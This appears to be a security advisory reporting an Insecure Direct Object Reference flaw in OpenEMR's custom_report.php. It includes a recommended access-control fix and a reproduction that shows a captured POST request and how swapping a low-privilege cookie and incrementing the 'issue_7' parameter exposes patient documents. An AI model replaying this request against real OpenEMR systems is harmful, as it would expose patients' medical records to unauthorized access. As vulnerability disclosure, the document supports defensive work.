Insecure Direct Object Reference
https://localhost/openemr/interface/patient_file/report/custom_report.php
“Issue_7”
Yes
Non-privilege users (accounting & front-office) can download patient reports containing medical reports and documents by sending a request to a vulnerable end-point. There is no Access Control enforced, therefore, any authenticated user of OpenEMR can download patient records by just tampering the “Issue_7” parameter to any valid number. By incrementing this value, an unauthorized user can download patient records.
Implement ACL check to ensure that only authorized users of OpenEMR system are able to download patient documents from the vulnerable end-point.
Aden Yap Chuen Zhen ([email protected])
Rizan, Sheikh
([email protected])
Ali Radzali
([email protected])
Login to OpenEMR as Admin and capture the POST request to the following end-point:
https://localhost/openemr/interface/patient_file/report/custom_report.php
In Burp, the HTTP POST request, cookie “OpenEMR” & parameter “issue_7” can be tampered.
Host: 192.168.0.141
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Origin: http://192.168.0.141
Connection: close
Referer: http://192.168.0.141/openemr/interface/patient_file/report/patient_report.php
Cookie: OpenEMR=E6toaL3R-180fA2-MIw80a-G7PJPCapZxrTYIzY%2Cofj5CXEG
Upgrade-Insecure-Requests: 1
include_demographics=demographics&include_billing=billing&pdf=1&issue_8=%2F&issue_10=%2F&issue_7=%2F14%2F&issue_6=%2F&issue_9=%2F&issue_11=%2F&issue_12=%2F
Replace the “OpenEMR” Cookie with Accountant Cookie and increment the “issue_7” parameter to any valid number eg “issue_7=/15/” to access patient documents.